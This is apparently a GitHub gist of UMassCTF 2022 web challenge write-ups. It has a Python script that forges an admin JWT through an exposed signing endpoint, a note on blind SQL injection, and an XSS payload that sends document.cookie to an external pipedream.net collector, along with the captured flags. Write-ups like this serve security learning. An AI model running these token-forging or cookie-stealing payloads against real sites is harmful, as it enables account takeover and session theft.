Skip to content

Instantly share code, notes, and snippets.

@krnbhargav

krnbhargav/autoflag.py

Last active April 4, 2022 17:24
Show Gist options
  • Save krnbhargav/387f3e5de0b7102a10edd23fbeaf6373 to your computer and use it in GitHub Desktop.
Save krnbhargav/387f3e5de0b7102a10edd23fbeaf6373 to your computer and use it in GitHub Desktop.
Download ZIP
umassctf-2022 web writeups
Raw
autoflag.py
#!/usr/bin/env python3
from httpx import *
import base64
url = "http://34.148.103.218:4829/"
def login():
return get(url+'login').cookies['access_token_cookie']
def sign_hmac(unsigned_token):
return post(url+'api/sign-hmac',data={"message":unsigned_token}).text
def get_flag(token):
return get(url+'flag',cookies={'access_token_cookie':token}).text
if __name__ == "__main__":
header = '{"typ":"JWT","alg":"HS256"}'
data = base64.b64decode(login().split('.')[1]+'==').decode()
data = data.replace("anonymous","admin")
unsigned_token = base64.b64encode(header.encode()).decode()+"."+base64.b64encode(data.encode()).decode()
signed_token=sign_hmac(unsigned_token).replace("+","-").replace("=","")
JWT = unsigned_token+ "."+signed_token
print(get_flag(JWT))
# flag : UMASS{W0W_TH1$_1$_4_C00L_FL4G_BRUH!_69420}
Raw
solution.md

venting

boolean-based and time-based blind sql injection at /fff5bf676ba8796f0c51033403b35311/login to get password of admin.

flag : UMASS{7H35U55Y1MP0573rCr4CK57H3C0D3}.

Raw
umassdining.py
#!/usr/bin/env python3
from httpx import *
url = "http://127.0.0.1:7788/"
attacker_handler="https://eogupsxh6qrqrxa.m.pipedream.net"
payload = f'''<script id='debug' src="/static/js/thing.js" data-iloveumass="');window.location.replace(`{attacker_handler}?c=${{document.cookie}}`);//"></script>'''
if __name__ == "__main__":
print(post(url+'register',data={'email':'[email protected]','essay':payload}).text)
# flag : UMASS{NUMB3R_0N3_1N_$TUD3NT_D1N1NG_XD86543267!}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment